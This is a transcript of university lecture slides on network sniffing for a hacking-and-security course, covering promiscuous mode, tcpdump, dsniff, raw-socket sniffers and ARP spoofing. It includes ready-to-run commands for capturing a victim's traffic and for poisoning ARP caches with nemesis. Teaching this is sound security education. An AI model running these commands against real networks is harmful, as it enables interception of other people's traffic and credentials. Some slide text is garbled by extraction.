문서의 제목 나눔고딕B, 54pt
Download
Report
Transcript 문서의 제목 나눔고딕B, 54pt
COM850 Computer Hacking and Security
0x440
Network Sniffing
Nov 27, 2014
Sangwook Lee
Table of Contents
• Network Sniffing
• Sniffing Tools
• ARP Spoofing
0X440 NETWORK SNIFFING
What is the Network Sniffing
The act of capturing packets
that aren’t necessarily meant
for public viewing is called
SNIFFING
0X440 NETWORK SNIFFING
Two Sniffing Flows According to Network
• Non-switched network environment
1. Setting the promiscuous mode
2. Packet-capturing
• Switched network environment
1. ARP spoofing
2. Packet-capturing
0X440 NETWORK SNIFFING
Non-switched vs. Switched Network
• The flow of traffic in a non-switched network (cont.)
It should be noted that step 3 and 4 can be reversed in order
0X440 NETWORK SNIFFING
Non-switched vs. Switched Network
• The flow of traffic in a non-switched network
Step 1 Node A transmits a frame to Node C
Step 2 Hub will broadcast this frame to active port
Setp 3 Node B will receive the frame and will examine
the address in the frame. After determining that it is n
ot the intended host, it will discard the frame
Step 4 Node C will receive the frame and will examine
the address in the frame. After determining that it is th
e intended host. it will process the frame further
How to
generateSNIFFING
Canary
0X440
NETWORK
Non-switched vs. Switched Network
• The flow of traffic in a switched network (cont.)
0X440 NETWORK SNIFFING
Non-switched vs. Switched Network
• The flow of traffic in a switched network
Step 1 Node A transmits a frame to Node C
Step 2 The switch will examine this frame and determi
ne what the intended host is. It will then set up a
connection between Node A and Node C so that they
have a ‘private’ connection
Setp 3 Node C will receive the frame and will examine
the address. After determining that it is the intended
host, it will process the frame further
0X440 NETWORK SNIFFING
Sniffing Non-switched Network
• For a host to be used as a sniffing agent,
– NIC must be set to the promiscuous mode
After the promiscuous mode is set...
NIC no longer drop network frames
which are addressed to other hosts
0X440 NETWORK SNIFFING
Sniffing Non-switched Network
• Setting the promiscuous mode
$ sudo ifconfig eth0 promisc
0X440 NETWORK SNIFFING
Packet Capturing Tools
• Sniffers
– tcpdump
– dsniff
• Raw socket sniffer
– raw_tcpsniff
– pcap_sniff (with libpcap)
– decode_sniff (with libpcap)
0X440 NETWORK SNIFFING
Sniffer: tcpdump
$ sudo tcpdump –X ‘ip host <victim IP>’
0X440 NETWORK SNIFFING
Sniffer: dsniff
$ sudo dsniff –n
0X440 NETWORK SNIFFING
Packet Capturing Tools
• Sniffers
– tcpdump
– dsniff
• Raw socket sniffer
– raw_tcpsniff
– pcap_sniff (with libpcap)
– decode_sniff (with libpcap)
0X440 NETWORK SNIFFING
# Raw Socket
• Raw socket is an network socket that allows direct
sending and receiving of Internet protocol packets
without any protocol-specific transport layer formatting
• Raw socket is specified by suing SOCK_RAW as the type
• There are multiple protocol options
– IPPROTO_TCP, IPPROTO_UDP, IPROTO_ICMP
0X440 NETWORK SNIFFING
Raw Socket Sniffer: raw_tcpsniff
raw_tcpsniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer: raw_tcpsniff
$ gcc –o raw_tcpsniff raw_tcpsniff.c
$ sudo ./raw_tcpsniff
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: pcap_sniff
pcap_sniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: pcap_sniff
$ gcc –o pcap_sniff pcap_sniff.c –lpcap
$ sudo ./pcap_sniff
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: Decode_sniff
decode_sniff.c
0X440 NETWORK SNIFFING
Raw Socket Sniffer with Libpcap: decode_sniff
$ gcc –o decode_sniff decode_sniff.c –lpcap
$ sudo ./decode_sniff
0X440 NETWORK SNIFFING
Sniffing Switched Networks
• ARP spoofing
One of the basic operations of the Ethernet protocol revolves
around ARP (Address Resolution Protocol) requests and
replies. In general, when Node A wants to communicate with
Node C on the network, it sends an ARP request. Node C will
send an ARP reply which will include the MAC address. Even
in a switched environment, this initial ARP request is sent in
a broadcast manner. It is possible for Node B to craft and
send an unsolicited, fake ARP reply to Node A. This fake ARP
reply will specify that Node B has the MAC address of Node
C. Node A will unwittingly send the traffic to Node B since it
professes to have the intended MAC address.
0X440 NETWORK SNIFFING
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)
– Attacker
• IP: 1.1.1.20
• MAC: 00:00:00:BB:BB:BB
– Victim1
• IP: 1.1.1.10
• MAC: 00:00:00:AA:AA:AA
– Victim2
• IP: 1.1.1.30
• MAC: 00:00:00:CC:CC:CC
0X440 NETWORK SNIFFING
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)
Attacker (System B) → Victim1 (System A)
$ sudo nemesis arp –v –r –d eth0 –S 1.1.1.30 –D 1.1.1.10
-h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA
-H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA
Attacker (System B) → Victim2 (System C)
$ sudo nemesis arp –v –r –d eth0 –S 1.1.1.10 –D 1.1.1.30
-h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC
-H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC
0X440 NETWORK SNIFFING
Sniffing Switched Network
• ARP spoofing using NEMESIS
ARP Cache of Victim1 (System A)
ARP Cache of Victim2 (System C)
the end